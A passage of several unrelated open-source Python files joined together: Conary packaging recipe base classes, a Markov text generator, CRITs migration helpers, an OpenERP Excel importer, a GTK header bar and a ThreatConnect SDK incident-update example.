'filesystem:runtime',
'findutils:runtime',
'gawk:runtime',
'grep:runtime',
'python:lib',
'python:runtime',
'sed:runtime',
'setup:runtime',
'sqlite:lib',
]
_recipeType = None
'''
PackageRecipe = '''class PackageRecipe(SourcePackageRecipe, BaseRequiresRecipe):
"""
NAME
====
B{C{PackageRecipe}} - Base class which provides Conary functionality
SYNOPSIS
========
C{PackageRecipe} is inherited by the other *PackageRecipe super classes
DESCRIPTION
===========
The C{PackageRecipe} class provides Conary recipes with references to
the essential troves which offer Conary's packaging requirements.
(python, sqlite, gzip, bzip2, tar, cpio, and patch)
Other PackageRecipe classes such as C{AutoPackageRecipe} inherit the
functionality offered by C{PackageRecipe}.
EXAMPLE
=======
A sample class that uses PackageRecipe to download source code from
a web site, unpack it, run "make", then run "make install"::
class ExamplePackage(PackageRecipe):
name = 'example'
version = '1.0'
def setup(r):
r.addArchive('http://code.example.com/example/')
r.Make()
r.MakeInstall()
"""
name = 'package'
internalAbstractBaseClass = 1
buildRequires = [
'bzip2:runtime',
'gzip:runtime',
'tar:runtime',
'cpio:runtime',
'patch:runtime',
]'''
groupDescription = '''A group refers to a collection of references to specific troves
(specific name, specific version, and specific flavor); the troves
may define all the software required to install a system, or sets of
troves that are available for a system, or other groups. Each group
may contain any kind of trove, including other groups, and groups
may reference other groups built at the same time as well as other
groups that exist in a repository.'''
GroupRecipe = '''
class GroupRecipe(_GroupRecipe, BaseRequiresRecipe):
"""
NAME
====
B{C{r.GroupRecipe()}} - Provides the original type of recipe interface
for creating groups.
DESCRIPTION
===========
The C{r.GroupRecipe} class provides the original interface for creating
groups that are stored in a Conary repository.
''' + groupDescription + '''
Most C{r.GroupRecipe} user commands accept a B{groupName}
parameter. This parameter specifies the group a particular command
applies to. For example, C{r.add('foo', groupName='group-bar')}
attempts to add the trove I{foo} to the group I{group-bar}.
The group specified by B{groupName} must exist, or be created before
troves may be added to it. The B{groupName} parameter may also be a list
of groups in which case the command will be applied to all groups. If
B{groupName} is not specified, or is None, then the command will apply to
the current default group.
PARAMETERS
==========
Several parameters may be set at the time of group creation. Although
these parameters are typically passed to C{r.createGroup()} for the
base group, they should be set as variables in the recipe class.
Note: Setting these parameters affects not only the value for the base
group, but also the default value for all newly created groups. For
example, if B{autoResolve} is set to C{True} in the base group, all other
groups created will have autoResolve set to C{True} by default.
    B{imageGroup} is an exception to this rule; it will not propagate to
sub groups.
The following parameters are accepted by C{r.GroupRecipe} with default
values indicated in parentheses when applicable:
B{depCheck} : (False) If set to C{True}, Conary will check for dependency
closure in this group, and raise an error if closure is not found.
B{autoResolve} : (False) If set to C{True}, Conary will include any extra
troves needed to make this group dependency complete.
B{checkOnlyByDefaultDeps} : (True) Conary only checks the
dependencies of troves that are installed by default, referenced in the
group. If set to C{False}, Conary will also check the dependencies of
B{byDefault} C{False} troves. Doing this, however, will prevent groups
with C{autoResolve}=C{True} from changing the C{byDefault} status of
required troves.
B{checkPathConflicts} : (True) Conary checks for path conflicts in each
group by default to ensure that the group can be installed without path
conflicts. Setting this parameter to C{False} will disable the check.
B{imageGroup} : (True) Indicates that this group defines a complete,
functioning system, as opposed to a group representing a system
component or a collection of multiple groups that might or might not
collectively define a complete, functioning system.
Image group policies will be executed separately for each image group.
This setting is recorded in the troveInfo for the group. This setting
    does not propagate to subgroups.
METHODS
=======
The following methods are applicable in Conary group recipes:
- L{add} : Adds a trove to a group
- L{addAll} : Add all troves directly contained in a given reference
to groupName
- L{addNewGroup} : Adds one newly created group to another newly
created group
- L{addReference} : (Deprecated) Adds a reference to a trove
- L{createGroup} : Creates a new group
- L{copyComponents}: Add components to one group by copying them
from the components in another group
- L{moveComponents}: Add components to one group, removing them
from the other in the process.
- L{remove} : Removes a trove
- L{removeComponents} : Define components which should not be
installed
- L{removeItemsAlsoInGroup}: removes troves in the group specified
that are also in the current group
- L{removeItemsAlsoInNewGroup}: removes troves in the group specified
that are also in the current group
- L{Requires} : Defines a runtime requirement for group
- L{requireLatest} : Raise an error if add* commands resolve to older
trove than the latest on branch. This can occur when a flavor of
a trove exists that is not the latest version.
- L{replace} : Replace troves
- L{setByDefault} : Set troves to be added to group by default
- L{setDefaultGroup} : Defines default group
- L{setSearchPath} : Specify the searchPath to search for troves
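    EXAMPLE
    =======
    A sketch of a simple group recipe (the label and trove names used here
    are hypothetical)::
        class GroupExample(GroupRecipe):
            name = 'group-example'
            version = '1.0'
            autoResolve = True
            def setup(r):
                r.setSearchPath('example.conary.com@ex:devel')
                r.createGroup('group-example-extras')
                r.add('tmpwatch')
                r.add('httpd', groupName='group-example-extras')
                r.addNewGroup('group-example-extras')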
"""
name = 'group'
internalAbstractBaseClass = 1
'''
GroupSetRecipe = '''
class GroupSetRecipe(_GroupSetRecipe, BaseRequiresRecipe):
"""
NAME
====
B{C{r.GroupSetRecipe()}} - Provides a set-oriented recipe interface
for creating groups.
DESCRIPTION
===========
The C{r.GroupSetRecipe} class provides a set-oriented interface for
creating groups that are stored in a Conary repository.
''' + groupDescription + '''
In a C{GroupSetRecipe}, almost all the operations are operations
on sets of references to troves, called B{TroveSets}. Each trove
reference in a TroveSet is a three-tuple of B{name}, B{version},
B{flavor}, along with an attribute, C{isInstalled}, that describes
whether the trove is considered B{installed} or B{optional}. Each
TroveSet is immutable. TroveSet operations return new TroveSets;
they do not modify existing TroveSets.
A TroveSet is created either by reference to other TroveSets or
by reference to a Repository. A C{GroupSetRecipe} must have at
least one C{Repository} object. A C{Repository} object has a
default search label list and default flavor, but can be used to
find any trove in any accessible Conary repository.
Repositories and TroveSets can be combined in order in a C{SearchPath}
object. A C{SearchPath} object can be used both for looking up
troves and as a source of troves for dependency resolution.
TroveSets in a SearchPath are searched recursively only when used
to look up dependencies; only the troves mentioned explicitly are
searched using C{find}. (Use C{TroveSet.flatten()} if you want to
search a TroveSet recursively using C{find}.)
Finally, the ultimate purpose of a group recipe is to create a
new binary group or set of groups. TroveSets have a C{createGroup}
method that creates binary groups from the TroveSets. (The binary
group with the same name as the source group can be created using
the C{Group} method, which itself calls C{createGroup}.) In the binary
groups created by C{Group} or C{createGroup}, the C{byDefault} flag
is used to indicate B{installed} (C{byDefault=True}) or B{optional}
(C{byDefault=False}).
In summary, C{Repository} objects are the source of all references
to troves in TroveSets, directly or indirectly. The TroveSets are
manipulated in various ways until they represent the desired groups,
and then those groups are built with C{createGroup} (or C{Group}).
METHODS
=======
The following recipe methods are available in Conary group set recipes:
- L{Repository} : Creates an object representing a respository
with a default search label list and flavor.
- L{SearchPath} : Creates an object in which to search for
troves or dependencies.
- L{Group} : Creates the primary group object.
- L{Script} : Creates a single script object.
- L{Scripts} : Associates script objects with script types.
- L{SystemModel} : Converts a system model to a TroveSet.
- L{dumpAll} : Displays copious output describing each action.
- L{track} : Displays less copious output describing specific
troves.
- L{writeDotGraph} : Writes "dot" graph of recipe structure.
The following methods are available in C{Repository} objects:
- C{Repository.find} : Search the Repository for specified troves
- C{Repository.latestPackages} : Get latest normal packages of the
default flavor on the default label
The following methods are available in C{SearchPath} objects:
- C{SearchPath.find} : Search the SearchPath for specified troves
The following methods are available in C{TroveSet} objects:
- C{TroveSet.components} : Recursively search for named components
- C{TroveSet.createGroup} : Create a binary group
- C{TroveSet.depsNeeded} : Get troves satisfying dependencies
- C{TroveSet.difference} : Subtract one TroveSet from another (C{-})
- C{TroveSet.dump} : Debugging: print the contents of the TroveSet
- C{TroveSet.find} : Search the TroveSet for specified troves
- C{TroveSet.findByName} : Find troves by regular expression
- C{TroveSet.findBySourceName} : Find troves by the name of the source
package from which they were built
- C{TroveSet.flatten} : Resolve trove references recursively
- C{TroveSet.getInstall} : Get only install troves from set
- C{TroveSet.getOptional} : Get only optional troves from set
- C{TroveSet.isEmpty} : Assert that the TroveSet is entirely empty
- C{TroveSet.isNotEmpty} : Assert that the TroveSet contains something
- C{TroveSet.makeInstall} : Make all troves install, or add all
provided troves as install troves
- C{TroveSet.makeOptional} : Make all troves optional, or add all
provided troves as optional troves
- C{TroveSet.members} : Resolve exactly one level of trove
references, return only those resolved references
- C{TroveSet.packages} : Resolve trove references recursively,
return packages
- C{TroveSet.patch} : Replace troves in the TroveSet with
matching-named troves from the replacement set
- C{TroveSet.union} : Get the union of all provided TroveSets (C{|}, C{+})
- C{TroveSet.update} : Replace troves in the TroveSet with
all troves from the replacement set
Except for C{TroveSet.dump}, which prints debugging information,
each of these C{Repository}, C{SearchPath}, and C{TroveSet} methods
returns a C{TroveSet}.
EXAMPLE
=======
This is an example recipe that uses the search path included in
a product definition, if available, to provide a stable search.
It adds to the base C{group-appliance-platform} the httpd, mod_ssl,
and php packages, as well as all the required dependencies::
class GroupMyAppliance(GroupSetRecipe):
name = 'group-my-appliance'
version = '1.0'
def setup(r):
r.dumpAll()
repo = r.Repository('conary.rpath.com@rpl:2', r.flavor)
searchPathList = [ r.Repository(r.macros.buildlabel, r.flavor) ]
if 'productDefinitionSearchPath' in r.macros:
# proper build with product definition
searchPathList.extend([repo[x] for x in
r.macros.productDefinitionSearchPath.split('\\\\n')])
else:
# local test build
searchPathList.append(
repo['group-os=conary.rpath.com@rpl:2'])
searchPath = r.SearchPath(*searchPathList)
base = searchPath['group-appliance-platform']
additions = searchPath.find(
'httpd',
'mod_ssl',
'php')
# We know that base is dependency-closed and consistent
# with the searchPath, so just get the extra deps we need
deps = (additions + base).depsNeeded(searchPath)
r.Group(base + additions + deps)
Next, an example of building a platform derived from another platform,
adding all packages defined locally to the group::
class GroupMyPlatform(GroupSetRecipe):
name = 'group-my-platform'
version = '1.0'
def setup(r):
centOS = r.Repository('centos.rpath.com@rpath:centos-5', r.flavor)
local = r.Repository('repo.example.com@example:centos-5', r.flavor)
pkgs = centOS['group-packages']
std = centOS['group-standard']
                localPackages = local.latestPackages()
std += localPackages
pkgs += localPackages
stdGrp = std.createGroup('group-standard')
pkgGrp = pkgs.createGroup('group-packages')
r.Group(stdGrp + pkgGrp)
"""
name = 'groupset'
internalAbstractBaseClass = 1
'''
BuildPackageRecipe = '''class BuildPackageRecipe(PackageRecipe):
"""
NAME
====
B{C{BuildPackageRecipe}} - Build packages requiring Make and shell
utilities
SYNOPSIS
========
C{class I{className(BuildPackageRecipe):}}
DESCRIPTION
===========
The C{BuildPackageRecipe} class provides recipes with capabilities for
building packages which require the C{make} utility, and additional,
standard shell tools, (coreutils) and the programs needed to run
C{configure}. (findutils, C{gawk}, C{grep}, C{sed}, and diffutils)
C{BuildPackageRecipe} inherits from C{PackageRecipe}, and therefore
includes all the build requirements of C{PackageRecipe}.
EXAMPLE
=======
C{class DocbookDtds(BuildPackageRecipe):}
Uses C{BuildPackageRecipe} to define the class for a Docbook Document Type
Definition collection recipe.
"""
name = 'buildpackage'
internalAbstractBaseClass = 1
buildRequires = [
'coreutils:runtime',
'make:runtime',
'mktemp:runtime',
# all the rest of these are for configure
'file:runtime',
'findutils:runtime',
'gawk:runtime',
'grep:runtime',
'sed:runtime',
'diffutils:runtime',
]
Flags = use.LocalFlags'''
CPackageRecipe = '''class CPackageRecipe(BuildPackageRecipe):
"""
NAME
====
B{C{CPackageRecipe}} - Build packages consisting of binaries built from C
source code
SYNOPSIS
========
C{class I{className(CPackageRecipe):}}
DESCRIPTION
===========
The C{CPackageRecipe} class provides the essential build requirements
needed for packages consisting of binaries built from C source code, such
    as the linker and C library. C{CPackageRecipe} inherits from
C{BuildPackageRecipe}, and therefore includes all the build requirements of
C{BuildPackageRecipe}.
Most package recipes which are too complex for C{AutoPackageRecipe}, and
consist of applications derived from C source code which do not require
additional shell utilities as build requirements use the
C{CPackageRecipe} class.
EXAMPLE
=======
C{class Bzip2(CPackageRecipe):}
Defines the class for a C{bzip2} recipe using C{AutoPackageRecipe}.
"""
name = 'cpackage'
internalAbstractBaseClass = 1
buildRequires = [
'binutils:runtime',
'binutils:lib',
'binutils:devellib',
'gcc:runtime',
'gcc:lib',
'gcc:devel',
'gcc:devellib',
'glibc:runtime',
'glibc:lib',
'glibc:devellib',
'glibc:devel',
'libgcc:lib',
'libgcc:devellib',
'debugedit:runtime',
'elfutils:runtime',
]
Flags = use.LocalFlags'''
AutoPackageRecipe = '''class AutoPackageRecipe(CPackageRecipe):
"""
NAME
====
B{C{AutoPackageRecipe}} - Build simple packages with auto* tools
SYNOPSIS
========
C{class I{className(AutoPackageRecipe):}}
DESCRIPTION
===========
The C{AutoPackageRecipe} class provides a simple means for the
creation of packages from minimal recipes, which are built from source
code using the auto* tools, such as C{automake}, and C{autoconf}.
Processing in the C{AutoPackageRecipe} class is a simple workflow modeled
    after building software from source code, and is essentially composed of
these steps:
1. Unpack source archive
2. C{configure}
3. C{make}
4. C{make install}
5. Applying Conary policy (optional)
With C{AutoPackageRecipe} the recipe writer does not necessarily need to
define the C{Configure}, C{Make}, or C{MakeInstall} methods, which allows
for very compact, and simple recipes.
The recipe's child classes should define the C{unpack()} method in order
to populate the source list.
Invoke the C{policy} method, with necessary policy parameters, and
keywords in your recipe to enforce Conary policy in the package.
If the standard C{Configure()}, C{Make()}, and C{MakeInstall()} methods
are insufficient for your package requirements, you should define your own
methods to override them.
    Of the three methods, C{Configure} and C{Make} are least likely to be
insufficient, and require overriding for the majority of recipes using
C{AutoPackageRecipe}.
EXAMPLE
=======
C{class Gimp(AutoPackageRecipe):}
Defines the class for a GNU Image Manipulation Program (Gimp) recipe using
C{AutoPackageRecipe}.
"""
Flags = use.LocalFlags
name = 'autopackage'
internalAbstractBaseClass = 1
def setup(r):
r.unpack()
r.configure()
r.make()
r.makeinstall()
r.policy()
def unpack(r):
pass
def configure(r):
r.Configure()
def make(r):
r.Make()
def makeinstall(r):
r.MakeInstall()
def policy(r):
pass'''
UserInfoRecipe = '''class UserInfoRecipe(UserGroupInfoRecipe,
BaseRequiresRecipe):
"""
NAME
====
B{C{UserInfoRecipe}} - Build user info packages
SYNOPSIS
========
C{UserInfoRecipe} is used to create packages that define a system user
DESCRIPTION
===========
The C{UserInfoRecipe} class provides an interface to define a system
user through the C{r.User} method. The C{r.User} method is also
available in the C{PackageRecipe} class.
EXAMPLE
=======
A sample class that uses C{UserInfoRecipe} to define a user::
class ExamplePackage(UserInfoRecipe):
name = 'info-example'
version = '1.0'
def setup(r):
r.User('example', 500)
"""
name = 'userinfo'
internalAbstractBaseClass = 1'''
RedirectRecipe = '''class RedirectRecipe(_RedirectRecipe, BaseRequiresRecipe):
name = 'redirect'
internalAbstractBaseClass = 1'''
FilesetRecipe = '''class FilesetRecipe(_FilesetRecipe, BaseRequiresRecipe):
name = 'fileset'
internalAbstractBaseClass = 1'''
GroupInfoRecipe = '''class GroupInfoRecipe(UserGroupInfoRecipe,
BaseRequiresRecipe):
"""
NAME
====
B{C{GroupInfoRecipe}} - Build group info packages
SYNOPSIS
========
C{GroupInfoRecipe} is used to create packages that define a system group
DESCRIPTION
===========
The C{GroupInfoRecipe} class provides an interface to define a system
group through the C{r.Group} method. The C{r.Group} method is also
available in the C{PackageRecipe} class.
The C{GroupInfoRecipe} class should be used if a system group must exist
independently from any system users.
EXAMPLE
=======
A sample class that uses C{GroupInfoRecipe} to define a group::
class ExamplePackage(GroupInfoRecipe):
name = 'info-example'
version = '1.0'
def setup(r):
r.Group('example', 500)
"""
name = 'groupinfo'
internalAbstractBaseClass = 1'''
DerivedPackageRecipe = '''class DerivedPackageRecipe(AbstractDerivedPackageRecipe, BaseRequiresRecipe):
"""
NAME
====
B{C{DerivedPackageRecipe}} - Build derived packages
SYNOPSIS
========
C{DerivedPackageRecipe} is used to modify shadows of existing binary
packages
DESCRIPTION
===========
The C{DerivedPackageRecipe} class provides an interface to modify the
contents of a shadowed binary trove without recooking from source.
To use this recipe class, first shadow the upstream package, then change
the recipe.
EXAMPLE
=======
A sample class that uses DerivedPackageRecipe to replace contents of
a config file::
class ExamplePackage(DerivedPackageRecipe):
name = 'example'
version = '1.0'
def setup(r):
r.Replace('foo', 'bar', '/etc/example.conf')
"""
name = 'derivedpackage'
internalAbstractBaseClass = 1'''
CapsuleRecipe = '''class CapsuleRecipe(AbstractCapsuleRecipe, BaseRequiresRecipe):
"""
NAME
====
B{C{CapsuleRecipe}} - Build Capsule packages
SYNOPSIS
========
C{CapsuleRecipe} is used to create a package that contains an unmodified,
foreign package.
DESCRIPTION
===========
The C{CapsuleRecipe} class provides an interface to create a capsule
package. A capsule package encapsulates an unmodified, foreign package that
is created by another packaging system. Currently only RPM is supported.
When a capsule package is installed or updated, the actual install or update
is done by Conary calling the other packaging system.
EXAMPLE
=======
A sample class that uses CapsuleRecipe to create a Conary capsule package
containing a single RPM::
class ExamplePackage(CapsuleRecipe):
name = 'example'
version = '1.0'
def setup(r):
r.addCapsule('foo.rpm')
"""
name = 'capsule'
internalAbstractBaseClass = 1
buildRequires = [
'bzip2:runtime',
'gzip:runtime',
'tar:runtime',
'cpio:runtime',
'patch:runtime',
]'''
DerivedCapsuleRecipe = '''class DerivedCapsuleRecipe(AbstractDerivedCapsuleRecipe, BaseRequiresRecipe):
"""
NAME
====
B{C{DerivedCapsuleRecipe}} - Build derived capsule packages
SYNOPSIS
========
C{DerivedCapsuleRecipe} is used to modify shadows of existing binary
capsule packages
DESCRIPTION
===========
The C{DerivedCapsuleRecipe} class provides an interface to modify the
contents of a binary trove which contains a capsule without
recooking from source.
To use this recipe class, first shadow the upstream package, then change
the recipe.
Note that the Remove build action is not supported for files defined within
a capsule.
EXAMPLE
=======
A sample class that uses DerivedCapsuleRecipe to replace contents of
a config file::
class ExampleCapsule(DerivedCapsuleRecipe):
name = 'example'
version = '1.0'
def setup(r):
r.Replace('foo', 'bar', '/etc/example.conf')
"""
name = 'derivedcapsule'
internalAbstractBaseClass = 1'''
recipeNames = {'baserequires': 'BaseRequiresRecipe',
'package': 'PackageRecipe',
'buildpackage': 'BuildPackageRecipe',
'cpackage': 'CPackageRecipe',
'autopackage': 'AutoPackageRecipe',
'userinfo': 'UserInfoRecipe',
'groupinfo': 'GroupInfoRecipe',
'derivedpackage': 'DerivedPackageRecipe',
'group': 'GroupRecipe',
'groupset': 'GroupSetRecipe',
'redirect': 'RedirectRecipe',
'fileset': 'FilesetRecipe',
'capsule': 'CapsuleRecipe',
'derivedcapsule': 'DerivedCapsuleRecipe',
}
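# Reverse lookup from recipe class name back to recipe name, plus a map from
# recipe name to the default recipe source text defined in this module.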
packageNames = dict([(x[1], x[0]) for x in recipeNames.iteritems()])
import sys
defaultRecipes = dict([(x[0], sys.modules[__name__].__dict__[x[1]]) for x in recipeNames.iteritems()])
| fedora-conary/conary | conary/build/defaultrecipes.py | Python | apache-2.0 | 27,584 | 0.000435 |
import random
def markov_analysis( fname, n ):
    """Reads a text file and performs Markov analysis.
Return a dictionary that maps from prefixes to a collection of suffixes.
fname: a text file
n: n order
"""
d = {}
prefix = tuple()
fin = open( fname )
for line in fin:
words = line.strip().split()
        for word in words:
            if len( prefix ) < n:
                # keep collecting words until the prefix is n words long
                prefix += ( word, )
                continue
            # if there is no entry for this prefix, make one; then record
            # this word as one of the prefix's suffixes
            d.setdefault( prefix, [] ).append( word )
            prefix = prefix[1:] + ( word, )
    fin.close()
    return d
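# The mapping built above looks like {('half', 'the'): ['world', 'time', ...]}:
# each n-word prefix maps to the list of words observed to follow it.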
def generate_random_text( suffix_map, n ):
"""Generates a random text with n words based on the Markov analysis.
"""
prefix = random.choice( suffix_map.keys() )
for i in range( n ):
suffixes = suffix_map.get( prefix, None )
if suffixes == None:
# if the start isn't in map, wo got to the end of the
# original text, so we have to start again.
            generate_random_text( suffix_map, n - i )
return
word = random.choice( suffixes )
print word,
prefix = prefix[1:] + ( word, )
generate_random_text( markov_analysis( 'emma.txt', 2 ), 100 )
| JohnHwee/show-me-the-code | Python/0052/main.py | Python | gpl-2.0 | 1,327 | 0.024115 |
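# Schema migration helpers for IP documents.  Each helper receives the
# document instance as ``self`` and advances schema_version by one step;
# migrate_ip() chains them to bring a document up to the latest schema (3).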
def migrate_ip(self):
"""
Migrate to the latest schema version.
"""
migrate_1_to_2(self)
migrate_2_to_3(self)
def migrate_2_to_3(self):
"""
Migrate from schema 2 to 3.
"""
if self.schema_version < 2:
migrate_1_to_2(self)
if self.schema_version == 2:
self.schema_version = 3
self.save()
self.reload()
def migrate_1_to_2(self):
"""
Migrate from schema 1 to 2.
"""
if self.schema_version < 1:
migrate_0_to_1(self)
if self.schema_version == 1:
from crits.core.core_migrate import migrate_analysis_results
migrate_analysis_results(self)
self.schema_version = 2
self.save()
self.reload()
def migrate_0_to_1(self):
"""
Migrate from schema 0 to 1.
"""
if self.schema_version < 1:
self.schema_version = 1
| Lambdanaut/crits | crits/ips/migrate.py | Python | mit | 869 | 0.003452 |
async def fun():
    """Note that a coroutine function must be declared with async def."""
async for a in b:
if a > 5:
break
else:
continue
| pyta-uoft/pyta | examples/ending_locations/async_for.py | Python | gpl-3.0 | 169 | 0 |
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 12 09:56:42 2012
@author: truiz
"""
from sys import argv
import xlrd
import xmlrpclib
from datetime import datetime
from ustr_test import ustr
def loadProjectsTasks(fileName, HOST, PORT, DB, USER, PASS):
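    """Load project issues, tasks and task work entries from an Excel
    workbook into OpenERP over XML-RPC (sheet 0: issues, sheet 1: tasks,
    sheet 2: works).
    """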
ISSUES_PAGE = 0
TASKS_PAGE = 1
WORKS_PAGE = 2
''' Objects needed for rpc calls '''
url = 'http://%s:%d/xmlrpc/' % (HOST, PORT)
common_proxy = xmlrpclib.ServerProxy(url+'common')
object_proxy = xmlrpclib.ServerProxy(url+'object')
wizard_proxy = xmlrpclib.ServerProxy(url+'wizard')
workflow_proxy = xmlrpclib.ServerProxy(url+'workflow')
uid = common_proxy.login(DB, USER, PASS)
ID_ADDR = 1
def clean(cadena):
if isinstance(cadena, str):
return cadena and ustr(cadena).strip() or None
return cadena
def cleanDict(d):
res = {}
for k in d:
if not d[k] is None:
res.update({k: d[k]})
return res
def readSheet(fileName, nSheet):
# Open workbook
book = xlrd.open_workbook(fileName, formatting_info=True)
sheet = book.sheet_by_index(nSheet)
values = []
for T in range(sheet.nrows):
values.append([clean(v) for v in sheet.row_values(T)])
return values
def searchTasks(project_id, tasks):
res = []
for t in tasks:
if t[0] != 'ID':
if int(t[1]) == project_id:
res.append(t)
return res
def searchWorks(task_id, works):
res = []
for w in works:
if w[0] != 'ID TASK':
if int(w[0]) == task_id:
res.append(w)
return res
# Read project issue sheet
issues = readSheet(fileName, ISSUES_PAGE)
# Read project tasks sheet
tasks = readSheet(fileName, TASKS_PAGE)
# Read project work sheet
works = readSheet(fileName, WORKS_PAGE)
for issue in issues:
if issue[0] != 'ID':
if issue[4]:
user_mail = object_proxy.execute(
DB, uid, PASS, 'res.users', 'read', int(issue[4]),
['user_email'])
else:
                user_mail = {'user_email': None}
addr = issue[7] and (int(issue[
7]) == 3 and ID_ADDR or int(issue[7])) or None
values_issue = {
'name': ustr(issue[1]),
'categ_id': int(issue[3]),
'project_id': int(issue[2]),
'assigned_to': issue[4] and int(issue[4]) or None,
'type_id': int(issue[5]),
'partner_id': int(issue[6]),
'partner_address_id': addr,
'state': 'open',
'description': ustr(issue[8]),
'email_from': issue[4] and user_mail['user_email'] or None,
'active': True,
}
values_issue = cleanDict(values_issue)
project_id = object_proxy.execute(
DB, uid, PASS, 'project.issue', 'create', values_issue)
if project_id:
if issue[4]:
object_proxy.execute(DB, uid, PASS, 'project.issue',
'write', [
project_id],
{'assigned_to': int(issue[4]),
'user_id': int(issue[4])})
project_tasks = searchTasks(int(issue[0]), tasks)
if project_tasks:
for task in project_tasks:
values_tasks = {
'name': values_issue['name'],
'project_id': values_issue['project_id'],
'assigned_to': values_issue['assigned_to'],
'user_id': values_issue['assigned_to'],
'planned_hours': task[2],
'remaining_hours': task[3],
'type_id': values_issue['type_id'],
'partner_id': values_issue['partner_id'],
'state': 'open',
'date_start': datetime.now().strftime("%Y/%m/%d %H:%M:%S"),
'date_end': datetime.now().strftime("%Y/%m/%d %H:%M:%S"),
'description': values_issue['description'],
}
values_tasks = cleanDict(values_tasks)
task_id = object_proxy.execute(
DB, uid, PASS, 'project.task', 'create', values_tasks)
if task_id:
object_proxy.execute(DB, uid, PASS,
'project.issue', 'write', [
project_id],
{'task_id': task_id})
task_works = searchWorks(int(task[0]), works)
if task_works:
for work in task_works:
values_works = {
'name': ustr(work[1]),
'hours': work[2],
'date': datetime.now().strftime("%Y/%m/%d %H:%M:%S"),
'user_id': values_issue['assigned_to'],
'task_id': task_id,
}
work_id = object_proxy.execute(
DB, uid, PASS, 'project.task.work',
'create', values_works)
if work_id:
object_proxy.execute(DB, uid, PASS,
'project.task', 'write', [
task_id], {'state': task[4]})
object_proxy.execute(DB, uid, PASS, 'project.issue', 'write', [
project_id], {'state': issue[9]})
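# Example invocation (sketch; the server, database and credentials below are
# hypothetical):
# loadProjectsTasks('projects.xls', 'localhost', 8069, 'mydb', 'admin', 'admin')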
| 3dfxsoftware/cbss-addons | issue_load/wizard/migrate.py | Python | gpl-2.0 | 6,250 | 0.00128 |
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gio
UI_PATH = '/io/github/ImEditor/ui/'
class ImEditorHeaderBar():
__gtype_name__ = 'ImEditorHeaderBar'
def __init__(self):
builder = Gtk.Builder.new_from_resource(UI_PATH + 'headerbar.ui')
self.header_bar = builder.get_object('header_bar')
self.menu_button = builder.get_object('menu_button')
self.select_button = builder.get_object('select_button')
self.pencil_button = builder.get_object('pencil_button')
builder.add_from_resource(UI_PATH + 'menu.ui')
self.window_menu = builder.get_object('window-menu')
self.menu_button.set_menu_model(self.window_menu)
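# Typical usage (sketch): the main window would attach this header bar with
# window.set_titlebar(ImEditorHeaderBar().header_bar).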
| ImEditor/ImEditor | src/interface/headerbar.py | Python | gpl-3.0 | 711 | 0.004219 |
# -*- coding: utf-8 -*-
""" standard """
from random import randint
import re
""" custom """
from examples.working_init import *
from threatconnect.Config.ResourceType import ResourceType
#
# CHANGE FOR YOUR TESTING ENVIRONMENT
# - These incidents must be created before running this script
#
owner = 'Example Community' # org or community
lu_id = 34 # incident id for loop update
mu_id = 35 # incident id for manual update
# dl_id = 999999 # threat id to delete
adversary_id = 5 # adversary resource id to associate with incident
victim_id = 1 # victim resource id to associate with incident
ip_address = '10.20.30.40' # email address to associate to adversary
rn = randint(1, 1000) # random number generator for testing
def main():
""" """
# (Optional) SET THREAT CONNECT LOG (TCL) LEVEL
tc.set_tcl_file('log/tc.log', 'debug')
tc.set_tcl_console_level('critical')
# (Required) Instantiate a Resource Object
resources = tc.incidents()
#
# (Optional) retrieve results from API and update selected resource in loop
#
# filters can be set to limit search results
try:
filter1 = resources.add_filter()
filter1.add_owner(owner) # filter on owner
except AttributeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
try:
resources.retrieve()
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
for res in resources:
# a particular resource can be matched by ID, Name or any other supported attribute
if res.id == lu_id:
#
# once a resource is matched any metadata on that resource can be updated
#
res.set_name('LU Incident #{0:d}'.format(rn))
# additional properties can be updated
res.set_event_date('2015-03-{0:d}T00:00:00Z'.format(randint(1, 30)))
#
# working with indicator associations
#
# existing indicator associations can be retrieved and iterated through
for association in res.indicator_associations:
# add delete flag to all indicator association that have a confidence under 10
if association.confidence < 10:
res.disassociate_indicator(association.resource_type, association.indicator)
# indicator associations can be added to a resource by providing the resource type and value
res.associate_indicator(ResourceType.ADDRESSES, ip_address)
#
# working with group associations
#
# existing group associations can be retrieved and iterated through
for association in res.group_associations:
# add delete flag to all group association that match DELETE
if re.findall('LU', association.name):
res.disassociate_group(association.resource_type, association.id)
# group associations can be added to a resource by providing the resource type and id
res.associate_group(ResourceType.ADVERSARIES, adversary_id)
#
# working with victim associations
#
# existing victim associations can be retrieved and iterated through
for association in res.victim_associations:
# add delete flag to all group association that match DELETE
if re.findall('LU', association.name):
res.disassociate_victim(association.id)
# victim associations can be added to a resource by providing the resource id
res.associate_victim(victim_id)
#
# working with attributes
#
# existing attributes can be loaded into the resource and iterated through
res.load_attributes()
for attribute in res.attributes:
# add delete flag to all attributes that have 'test' in the value.
if re.findall('test', attribute.value):
res.delete_attribute(attribute.id)
# add update flag to all attributes that have 'update' in the value.
if re.findall('update', attribute.value):
res.update_attribute(attribute.id, 'updated attribute #{0:d}'.format(rn))
# attributes can be added to a resource by providing the attribute type and value
res.add_attribute('Description', 'test attribute #{0:d}'.format(rn))
#
# working with tags
#
# existing tags can be loaded into the resource and iterated through
res.load_tags()
for tag in res.tags:
# add delete flag to all tags that have 'DELETE' in the name.
if re.findall('DELETE', tag.name):
res.delete_tag(tag.name)
# tags can be added to a resource by providing the tags value
res.add_tag('DELETE #{0:d}'.format(rn))
# (Required) commit this resource
try:
print('Updating resource {0!s}.'.format(res.name))
res.commit()
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
#
# (Optional) delete resource if required
#
# delete to any resource that has 'DELETE' in the name.
elif re.findall('DELETE', res.name):
try:
print('Deleting resource {0!s}.'.format(res.name))
res.delete() # this action is equivalent to commit
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
#
# (Optional) ADD RESOURCE EXAMPLE
#
# new resources can be added with the resource add method
resource = resources.add('DELETE #{0:d}'.format(rn), owner)
# additional properties can be added
resource.set_event_date('2015-03-{0:d}T00:00:00Z'.format(randint(1, 30)))
# attributes can be added to the new resource
resource.add_attribute('Description', 'Delete Example #{0:d}'.format(rn))
# tags can be added to the new resource
resource.add_tag('TAG #{0:d}'.format(rn))
# the security label can be set on the new resource
resource.set_security_label('TLP Green')
# commit this resource and add attributes, tags and security labels
try:
print('Adding resource {0!s}.'.format(resource.name))
resource.commit()
except RuntimeError as e:
